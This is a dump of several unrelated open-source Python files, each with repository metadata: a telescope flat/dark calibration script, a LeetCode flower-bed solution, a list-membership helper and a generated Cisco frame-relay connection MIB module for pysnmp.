PYTHON_VERSION = "%s.%s" % (sys.version_info.major, sys.version_info.minor)
TMP_DIR = "/tmp"
| 27.777778 | 75 | 0.728 | [
"MIT"
] | bobatsar/moviepy | tests/test_helper.py | 250 | Python |
import ipdb
import medis.speckle_nulling.sn_hardware as hardware
import medis.speckle_nulling.sn_preprocessing as pre
import numpy as np
import os
import astropy.io.fits as pf
import medis.speckle_nulling.sn_filehandling as flh
from configobj import ConfigObj
def build_median(imagelist, outputfile = None):
"""Takes a list of image paths and builds a median image"""
first = True
for image in imagelist:
hdulist= pf.open(image)
data = pre.combine_quadrants(hdulist)
#data= hdulist[0].data
#data = pre.combine_quadrants(data)
#filesused.append(image+'; ')
if first:
imcube = data[:,:,np.newaxis]
first = False
else:
            imcube = np.concatenate((imcube, data[:,:,np.newaxis]), axis=2)  # re-assign: np.concatenate returns a new array
hdulist.close()
medimage = np.median(imcube, axis=2)
if outputfile is not None:
print "Writing median image to "+outputfile
strfiles = [x+'; ' for x in imagelist]
strfilesused = ("Files used to create master image: "+
''.join(strfiles))
flh.writeout(medimage, outputfile,
comment = strfilesused)
return medimage
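# Illustrative usage sketch for build_median above (the FITS file names are
# hypothetical):
#   med = build_median(['bgd_0001.fits', 'bgd_0002.fits', 'bgd_0003.fits'],
#                      outputfile='medbackground.fits')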
def build_master_flat(mfminusmd, badpix=None,
kernelsize = 9,
outputfile = 'masterflat.fits',
removezeros = True):
"""removes bad pixels from a background subtracted master flat"""
im1 = pre.removebadpix(mfminusmd, badpix, kernelsize=kernelsize)
ans = im1/np.mean(im1)
if removezeros:
ans=pre.removebadpix(ans, ans==0, kernelsize = kernelsize)
flh.writeout(ans, outputfile)
return ans
def build_master_dark(rawdark, badpix = None, outputfile='masterdark.fits'):
ans=pre.removebadpix(rawdark, badpix)
flh.writeout(ans, outputfile)
return ans
def build_badpixmask(image,
method='gaussfit',outputfile = 'badpix.fits'):
if method == 'gaussfit':
masterbadpixelmask = pre.locate_badpix(image, sigmaclip = 2.5)
print "Writing badpix image to "+outputfile
flh.writeout(masterbadpixelmask, outputfile)
return masterbadpixelmask
if __name__ == "__main__":
hardwareconfigfile = 'speckle_instruments.ini'
configfilename = 'speckle_null_config.ini'
config = ConfigObj(configfilename)
bgdconfig= config['BACKGROUNDS_CAL']
outputdir = config['BACKGROUNDS_CAL']['dir']
pharo = hardware.PHARO_COM('PHARO',
configfile = hardwareconfigfile)
print ("\n\n\n\nThis script is meant to tell PHARO to take a bunch of backgrounds,\n darks, and flats, then assemble them into the correctly formatted 1024x1024 region \nthat we care about, and place them in the following directory:")
print config['BACKGROUNDS_CAL']['dir']
print ('\n\n\n\nIf this script does not work, my advice would be to bypass it completely and do it manually take some flats, backgrounds and darks. \nAssemble them yourselves (see sn_preprocessing.py), \nparticularly combine_quadrants, locate_badpix, and save them as masterflat.fits, masterdark.fits, badpix.fits in the same directory mentioned above')
filetypes = ['backgrounds',
'flats', 'flatdarks']
for ftype in filetypes:
imnames = []
commandstring = ("\n\n\n\nSet up Pharo to the configurations to take "+ftype.upper()+" then hit any key. ")
s= raw_input(commandstring)
if ftype == 'backgrounds':
for i in range(int(config['BACKGROUNDS_CAL']['N'])):
fname = pharo.take_src_return_imagename(
exptime = bgdconfig['bgdtime'])
imnames.append(fname)
print ftype.upper()+" taken so far: "
print imnames
background = build_median(imnames,
outputfile = os.path.join(outputdir, 'medbackground.fits'))
ipdb.set_trace()
if ftype == 'flats':
for i in range(int(config['BACKGROUNDS_CAL']['N'])):
fname = pharo.take_src_return_imagename(
exptime = bgdconfig['flattime'])
imnames.append(fname)
print ftype.upper()+" taken so far: "
print imnames
med_flat = build_median(imnames, outputfile=os.path.join(outputdir, 'medflat.fits'))
#XXXX fix flat fielding
if ftype == 'flatdarks':
for i in range(int(config['BACKGROUNDS_CAL']['N'])):
fname = pharo.take_src_return_imagename(
exptime = bgdconfig['flattime'])
imnames.append(fname)
print ftype.upper()+" taken so far: "
print imnames
med_flatdark = build_median(imnames, outputfile=os.path.join(outputdir, 'medflatdark.fits'))
bp = build_badpixmask(med_flatdark,
outputfile = os.path.join(outputdir,'badpix.fits'))
#bp = build_badpixmask(targ_bkgd-cal_bkgd,
# outputfile = os.path.join(outputdir,'badpix.fits'))
mf = build_master_flat(med_flat-med_flatdark, badpix=bp,
outputfile = os.path.join(outputdir,'masterflat.fits'))
| 43.040984 | 358 | 0.6235 | [
"MIT"
] | RupertDodkins/MEDIS | medis/speckle_nulling/take_flats_and_darks_old.py | 5,251 | Python |
class Solution:
def canPlaceFlowers(self, flowerbed, n: int) -> bool:
# Even with an empty list, the maximum amount we can place
# is len(flowerbed) // 2 (+ 1 if odd, +0 if even)
length = len(flowerbed)
if n > (length // 2) + 1 * (length & 1):
return False
# bail early. fits everywhere.
if n == 0:
return True
# bail early if [0].
if length == 1:
return flowerbed[0] == 0
# Start counting from 2 pos if [_, 0, ...]
if flowerbed[1] == 0:
# but decrement n if [0, 0, ...]
if flowerbed[0] == 0:
n -= 1
if n == 0:
return True
i = 2
# Start counting from 3rd pos if [_, 1, ...]
else:
i = 3
# Go through the flower bed and check adjacent positions.
while i < length:
# if available, check adjacent.
if flowerbed[i] == 0:
j, k = i - 1, i + 1
# previous is 0, check next and jump appropriately.
if flowerbed[j] == 0:
if k < length:
if flowerbed[k] == 0:
n -= 1
else:
# jump over and go two steps over
# to try that slot.
i += 3
continue
elif k == length:
return n <= 1
if n == 0:
return True
# go two positions over. Either we filled it or it was
# already a one.
i += 2
return n == 0
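# Illustrative usage sketch (not part of the original solution): a few example
# calls exercising the early exits and the adjacency checks described in the
# comments above.
if __name__ == "__main__":
    s = Solution()
    print(s.canPlaceFlowers([1, 0, 0, 0, 1], 1))  # True: the middle plot is free
    print(s.canPlaceFlowers([1, 0, 0, 0, 1], 2))  # False: only one plot fits
    print(s.canPlaceFlowers([0], 1))              # True: single empty plot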
| 36.125 | 67 | 0.398501 | [
"Unlicense"
] | DimitrisJim/leet | Python/Algorithms/605.py | 1,734 | Python |
def belong(in_list1: list, in_list2: list) -> bool:
"""
    Check whether or not all the elements in in_list1 belong to in_list2
:param in_list1: the source list
:param in_list2: the target list where to find the element in in_list1
:return: return True if the statement is verified otherwise return False
"""
return all(element in in_list2 for element in in_list1)
if __name__ == "__main__":
    print(belong([1,2,3,4],[4,5,6,5,7,0,4,2,3]))
 | 42.818182 | 77 | 0.698514 | [
"MIT"
] | angelmpalomares/ModelAndLanguagesForBioInformatics | Python/List/14.belong.py | 471 | Python |
#
# PySNMP MIB module CISCO-WAN-FR-CONN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-WAN-FR-CONN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:20:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
frameRelay, frChan = mibBuilder.importSymbols("BASIS-MIB", "frameRelay", "frChan")
ciscoWan, = mibBuilder.importSymbols("CISCOWAN-SMI", "ciscoWan")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, IpAddress, iso, TimeTicks, ModuleIdentity, Counter64, ObjectIdentity, Unsigned32, MibIdentifier, Integer32, NotificationType, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "IpAddress", "iso", "TimeTicks", "ModuleIdentity", "Counter64", "ObjectIdentity", "Unsigned32", "MibIdentifier", "Integer32", "NotificationType", "Counter32")
TruthValue, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "DisplayString")
ciscoWanFrConnMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 351, 150, 47))
ciscoWanFrConnMIB.setRevisions(('2002-09-18 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setRevisionsDescriptions(('Initial version of the MIB. The content of this MIB was originally available in CISCO-WAN-AXIPOP-MIB defined using SMIv1. The applicable objects from CISCO-WAN-AXIPOP-MIB are defined using SMIv2 in this MIB. Also the descriptions of some of the objects have been modified.',))
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setLastUpdated('200209180000Z')
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setContactInfo(' Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: [email protected]')
if mibBuilder.loadTexts: ciscoWanFrConnMIB.setDescription("The MIB module to configure the Frame Relay connection configuration. Terminologies Used: SIW - Frame-Relay-to ATM Service Interworking. In SIW, the ATM port connected to a frame relay port does not need to be aware that it is connected to an interworking function. This is explained in document FRF.8. NIW - Frame-Relay-to ATM Network Interworking. In NIW, the ATM port connected to a frame relay port does need to be aware that it is connected to an interworking function. PVC - Permanent Virtual Circuit OR Permanent Virtual Connection A frame relay logical link, whose endpoints and class of service are defined by network management. A PVC consists of the originating frame relay network element address, originating DLCI, terminating frame relay network element address and terminating DLCI. This is controlled by PAR(Portable Auto Route) controller. SPVC - Soft Permanent Virtual Circuits. This is a PVC controlled by PNNI Controller. Frame Relay PVC/SPVC end-point/Channel is referred to as frame Relay connection in this MIB. Traffic shaping parameters: CIR, EIR, Bc, Be, DE, Tc, AR corresponding to rate of the physical interface. CIR - Committed Information Rate. This is the rate of traffic that the PVC will support as 'comitted' traffic. The committed rate(in bits per second) at which the ingress access interface trunk interfaces, and egress access interface of a frame relay network transfer information to the destination frame relay end system under normal conditions. The rate is averaged over a minimum time interval Tc. AR - Access Rate The maximum number of bits per second that an end station can transmit into the network is bounded by the acess rate of the user-network interface. The line speed of the user network connection limits the access rate. Bc - Committed Burst Size The maximum amount of data(in bits) that the network agrees to transfer, under normal conditions during a time interval Tc. The data is in bytes in the current implementation. Be - Excess Burst Size The maximum amount of uncommitted data(in bits) in excess of BC that a frame relay network can attempt to deliver during a time interval Tc. This data generally is delivered with a low probability than Bc. The network treats Be data as discard eligible. The data is in bytes in the current implementation. Tc - The committed rate measurement interval. The time interval during which the user can send only BC committed amount of data and BE excess amount of data. EIR - Excess Information Rate This is the bandwidth in excess of CIR the PVC will be allowed to burst on a a given PVC. The average rate at which excess traffic is to be policed. This number is computed based on Bc, Be, CIR and Tc. DE - Discard Eligibility Frame Forwarding Port: Frame Forwarding Ports are identified by portType = frame-forward(3). NOTE: The objects related to frame relay ports are available in ifTable,if ifTable is implemented in service module/card. Following Service Modules support ifTable: FRSM-12 ")
frChanCnfGrp = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1))
frChanCnfGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1), )
if mibBuilder.loadTexts: frChanCnfGrpTable.setStatus('current')
if mibBuilder.loadTexts: frChanCnfGrpTable.setDescription('This table is for configuring connection parameters for frame relay connections.')
frChanCnfGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1), ).setIndexNames((0, "CISCO-WAN-FR-CONN-MIB", "chanNum"))
if mibBuilder.loadTexts: frChanCnfGrpEntry.setStatus('current')
if mibBuilder.loadTexts: frChanCnfGrpEntry.setDescription('An entry for each frame relay connection.')
chanNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanNum.setStatus('current')
if mibBuilder.loadTexts: chanNum.setDescription('The value of this object identifies the frame relay connection/channel index. Note that the actual range of the index supported by a card depends on the type of card. Supported Range for different Card Types: FRSM-4T1/E1 : Range is 16..271 (256 entries) FRSM-8T1/E1 : Range is 16..1015 (1000 entries) FRSM-T3/E3/HS2/ /HS2B-HSSI/T3B/E3B : Range is 16..2015 (2000 entries) FRSM-2CT3/HS2B-12IN1: Range is 16..4015 (4000 entries) For FRSM12 Card : Range is 16..16015 for Lower 16 bits Upper 16 bits contain Chassis Number and logical slot number.')
chanRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("add", 1), ("del", 2), ("mod", 3), ("outOfService", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanRowStatus.setStatus('current')
if mibBuilder.loadTexts: chanRowStatus.setDescription('This object is used for adding/modifying/deleting the channel. add(1) : For adding the frame relay connections. delete(2): For deleting frame relay connections. mod(3) : For Modifying frame relay connections. This is also used for uping the connection. outOfService(4) : Bring the Frame relay connection down.')
chanPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanPortNum.setStatus('current')
if mibBuilder.loadTexts: chanPortNum.setDescription("This object refers to the frame relay port on which channel is created. This is a mandatory object for creating the channel. For FRSM12 Card: This object contains the port's ifIndex value. ")
dLCI = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8388607))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: dLCI.setStatus('current')
if mibBuilder.loadTexts: dLCI.setDescription("The value of this object is the DLCI number of the channel. This is a mandatory object for creating the channel. All the connections on the same port should have a unique DLCI number. Note that if we are adding a channel to a port that has LMI signalling enabled, then we can not use DLCI number 0(ANNEX A & D) and 1023(STRATA LMI). The value of this object can be only 1000 if the portType = frame-forward(3) on which the frame relay connection is being created. That is, only one Frame Relay Connection can be created on a Frame Forwarding Port. For portHeaderLen = twoOctets(1) following restrictions apply. Range supported is '0..1023' DLCI values 0,1007, 1023 can not be used. For portHeaderLen = fourOctets(2) following restrictions apply. Range supported is '0..8388607' DLCI values 0,8257535 can not be used. ")
egressQSelect = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("highPriority", 1), ("lowPriority", 2), ("notSupported", 3))).clone('lowPriority')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQSelect.setStatus('current')
if mibBuilder.loadTexts: egressQSelect.setDescription('Selects one out of two possible port queues. The default port queue number is 1 which is the high priority queue. 1 = High priority queue 2 = Low priority queue 3 = Indicates that this entry is not used (eg: in FRSM-VHS, chanServType indicates the channel service type and would determine the queue to which the channel gets mapped) For FRSM12 Card: This object is used to select between the two ATM-COS queues in the egress direction. ')
ingressQDepth = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(4510, 2097151)).clone(65535)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ingressQDepth.setStatus('current')
if mibBuilder.loadTexts: ingressQDepth.setDescription("This variable sets the max depth for queue, before it starts dropping the cells. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (4510..'ffff'h). ingressQDepth should be greater than ingressQECNThresh and ingressQDEThresh For FRSM12 Card: Not Supported ")
ingressQECNThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(6553)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ingressQECNThresh.setStatus('current')
if mibBuilder.loadTexts: ingressQECNThresh.setDescription("This variable sets the max depth for queue, before it starts flow control. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
ingressQDEThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(32767)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ingressQDEThresh.setStatus('current')
if mibBuilder.loadTexts: ingressQDEThresh.setDescription("This variable sets the max depth for queue, before they become discard eligible. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
egressQDepth = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(65535)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQDepth.setStatus('current')
if mibBuilder.loadTexts: egressQDepth.setDescription("This variable sets the max depth for queue, before it starts dropping the cells. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). egressQDepth should be greater than egressQDEThresh and egressQECNThresh For FRSM12 Card: Not Supported ")
egressQDEThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(32767)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQDEThresh.setStatus('current')
if mibBuilder.loadTexts: egressQDEThresh.setDescription("This variable sets the max depth for queue, before they become discard eligible. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
egressQECNThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(6553)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: egressQECNThresh.setStatus('current')
if mibBuilder.loadTexts: egressQECNThresh.setDescription("This variable sets the max depth for queue, before it starts flow control. It is defined in terms of number of bytes. In all cards except the FRSM-VHS card, the range is limited to (0..'ffff'h). For FRSM12 Card: Not Supported ")
deTaggingEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: deTaggingEnable.setStatus('current')
if mibBuilder.loadTexts: deTaggingEnable.setDescription('This object enables/disables the DE tagging. The tagging is enabled only in the ingress direction. For FRSM12 Card: When this object is disabled, the ingress policer will never set the DE bit to 1 in the Frame Relay frames even if the incoming frame exceeds the Bc bucket. ')
cir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 52000000)).clone(2400)).setUnits('bps').setMaxAccess("readwrite")
if mibBuilder.loadTexts: cir.setStatus('current')
if mibBuilder.loadTexts: cir.setDescription('The value of this object is equal to the CIR parameter for this frame relay connection. The CIR value have to be less than or equal to the port speed. Any value from 1 to 2399 will be rounded off to 2400. Range supported for different interfaces/card: For E1 interface : Range is 0..2048000 For T1 interface : Range is 0..1536000 For E3 interface : Range is 0..34368000 For T3 interface : Range is 0..44736000 For HSSI : Range is 0..52000000 For FRSM-2CT3 : Range is 0..1536000 For FRSM-HS2B-12IN1: Range is 0..10240000 The CIR value can be 0 only for chanServType = uBR(5). ')
bc = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(5100)).setUnits('bytes').setMaxAccess("readwrite")
if mibBuilder.loadTexts: bc.setStatus('current')
if mibBuilder.loadTexts: bc.setDescription('The value of this object is equal to the committed burst size(BC) parameter for this PVC endpoint. The value of bc can not be 0 when cir is non zero. The value of bc has to be 0 if cir is 0. The peak value for bc in FRSM-VHS cards is (2^21 -1), i.e. 2097151 and for all other cards, it is 65535. For FRSM-VHS cards, the relation between CIR and Bc should be such that Tc is always less than 512 seconds. ')
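# --- Illustrative note (not part of the generated MIB code): the CIR/Bc relation
# mentioned above implies Tc = (Bc * 8) / CIR when Bc is expressed in bytes and CIR
# in bits per second. With the defaults above (Bc = 5100 bytes, CIR = 2400 bps) this
# gives Tc = 17 seconds, well under the 512-second limit cited for FRSM-VHS cards.
# Minimal sketch of that arithmetic (the helper name is an assumption, not MIB API):
def _example_tc_seconds(bc_bytes=5100, cir_bps=2400):
    # Tc is the committed rate measurement interval described in this MIB.
    return (bc_bytes * 8) / float(cir_bps)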
be = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 15), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(5100)).setUnits('bytes').setMaxAccess("readwrite")
if mibBuilder.loadTexts: be.setStatus('current')
if mibBuilder.loadTexts: be.setDescription('The value of this object is equal to the excess burst size(Be) parameter for this PVC endpoint. The value of be can not be 0 when cir is 0. The peak value for be : For FRSM-VHS and FRSM12 cards is (2^21 -1), i.e. 2097151 and For all other cards, it is 65535. For FRSM-VHS cards, setting the value of 2091751 will cause the policing to be disabled. ')
ibs = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 16), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2097151)).clone(100)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ibs.setStatus('current')
if mibBuilder.loadTexts: ibs.setDescription('The value of this object is equal to the excess burst size(Be) parameter for this PVC endpoint. The value of ibs should be less than or equal to bc when cir is greater than 0. The value of ibs has to be 0 when cir is 0. The peak value for ibs in FRSM-VHS cards is (2^21 -1), i.e. 2097151 and for all other cards, it is 65535. For FRSM12 Card: Not Supported ')
foreSightEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: foreSightEnable.setStatus('current')
if mibBuilder.loadTexts: foreSightEnable.setDescription('This variable enables/disables foreSight option. Following objects can be modified only when this object is set to enable(1): qir, mir, pir The RATE CONTROL FEATURE has to be ON in order to enable foresight and also modify its parameter. For FRSM12 Card: Not Supported ')
qir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 18), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000)).clone(160)).setUnits('fastpackets-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: qir.setStatus('current')
if mibBuilder.loadTexts: qir.setDescription('The value of this object is equal to the quiescent information rate for Foresight. The unit is 1 Cell/Sec = 16 fastpackets/sec. Following information about cps is for reference only: The peak value for qir in FRSM-VHS cards is 285714 cps and for all other cards, it is 10000 cps. For FRSM-VHS cards, cell will be the ATM cell (48 byte payload). For FRSM12 Card: Not Supported')
mir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 19), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000)).clone(160)).setUnits('fastpackets-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: mir.setStatus('current')
if mibBuilder.loadTexts: mir.setDescription('The value of this object is equal to the minimum information rate for Foresight. The unit is 1 Cell/Sec = 16 fastpackets/sec. Following information about cps is for reference only: The peak value for qir in FRSM-VHS cards is 285714 cps and for all other cards, it is 10000 cps. For FRSM-VHS cards, cell will be the ATM cell (48 byte payload). For FRSM12 Card: Not Supported ')
pir = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 20), Integer32().subtype(subtypeSpec=ValueRangeConstraint(160, 6400000)).clone(160)).setUnits('fastpackets-per-second').setMaxAccess("readwrite")
if mibBuilder.loadTexts: pir.setStatus('current')
if mibBuilder.loadTexts: pir.setDescription('The value of this object is equal to the peak information rate for Foresight. The unit is 1 Cell/Sec = 16 fastpackets/sec. Following information about cps is for reference only: The peak value for qir in FRSM-VHS cards is 285714 cps and for all other cards, it is 10000 cps. For FRSM-VHS cards, cell will be the ATM cell (48 byte payload). For FRSM12 Card: Not Supported ')
chanLocRmtLpbkState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 21), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanLocRmtLpbkState.setStatus('current')
if mibBuilder.loadTexts: chanLocRmtLpbkState.setDescription('This variable enables or disables the remote loopback for each channel. When you enable this option on a connection (channel) then all the cells that are coming from the network side would be looped back toward the network and all the frames coming from the user side would be dropped. This channel remote loopback has nothing to do with the chanTestType option, each one does a different function. For example, the channel remote loopback is used for looping the data toward the network and if this connection is terminated on an IPX then they can put a test equipment and measure some of the characteristics of the network. For FRSM12 Card: Not Supported ')
chanTestType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 22), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("testcon", 1), ("testdelay", 2), ("notest", 3))).clone('notest')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: chanTestType.setStatus('current')
if mibBuilder.loadTexts: chanTestType.setDescription('The chanTestType starts testing the continuity or delay of a connection. It sends specific cell patterns toward the network and the terminating end of this connection has to be an MGX8220 or ASI of a BPX in order for this test to be working. The receiving node would loop back when it receives these cells. The test should be done in about couple of seconds. The testcon tests the continuity of the connection and testdelay uses the same test except that it measures for delay through the network. To test the delay follow this procedure: a- set chanTestType to testdelay b- read chanTestState till it is Pass or Fail c- Read chanRTDResult for the delay if it is Pass *Note that the chanTestType would go back to notest when the test is completed To test the continuity follow this procedure: a- set chanTestType to testcon b- read chanTestState till it is Pass or Fail *Note that the chanTestType would go back to notest when the test is completed You CAN NOT select 2 tests back to back, you have to select one and wait for the result and then start the other one. SYNTAX When you select testdelay This is the type of the test 1 = Test Continuity 2 = Test Delay 3 = No Test ')
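# --- Illustrative sketch (not part of the generated MIB code): the delay-test
# procedure described above driven from an SNMP manager with pysnmp's high-level
# API. The agent address, community string and channel index (16) are assumptions,
# and the compiled MIB must be resolvable by the manager for the symbolic names.
def _example_run_delay_test():
    from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                              ContextData, ObjectType, ObjectIdentity,
                              setCmd, getCmd)
    target = (SnmpEngine(), CommunityData('private'),
              UdpTransportTarget(('192.0.2.1', 161)), ContextData())
    # a- set chanTestType to testdelay(2) on channel 16
    next(setCmd(*target,
                ObjectType(ObjectIdentity('CISCO-WAN-FR-CONN-MIB', 'chanTestType', 16), 2)))
    # b- poll chanTestState until passed(1) or failed(2); c- on passed(1), read
    #    chanRTDResult for the round-trip delay in milliseconds
    for symbol in ('chanTestState', 'chanRTDResult'):
        errInd, errStat, errIdx, varBinds = next(getCmd(*target,
            ObjectType(ObjectIdentity('CISCO-WAN-FR-CONN-MIB', symbol, 16))))
        print(varBinds)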
chanTestState = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 23), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("passed", 1), ("failed", 2), ("inprogress", 3), ("notinprogress", 4))).clone('notinprogress')).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanTestState.setStatus('current')
if mibBuilder.loadTexts: chanTestState.setDescription('This shows the state of the test When you add a connection then the chanTestState becomes notinprogress and when you select any test, it would go to inprogress state and after it completes the test, it will go to failed or passed state. 1 = Passed 2 = Failed 3 = In Progress 4 = Not In Progress ')
chanRTDResult = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(65535)).setMaxAccess("readonly")
if mibBuilder.loadTexts: chanRTDResult.setStatus('current')
if mibBuilder.loadTexts: chanRTDResult.setDescription('This is round trip delay in milliseconds. When you select testdelay option for the chanTestType, the result of the test that is measured in milliseconds can be read in chanRTDResult. ')
chanType = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 1, 2, 1, 1, 1, 25), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("frNIW", 1), ("frSIW-transparent", 2), ("frSIW-translate", 3), ("frFUNI", 4), ("frForward", 5), ("frNIWReplace", 6)))).setMaxAccess("readwrite")
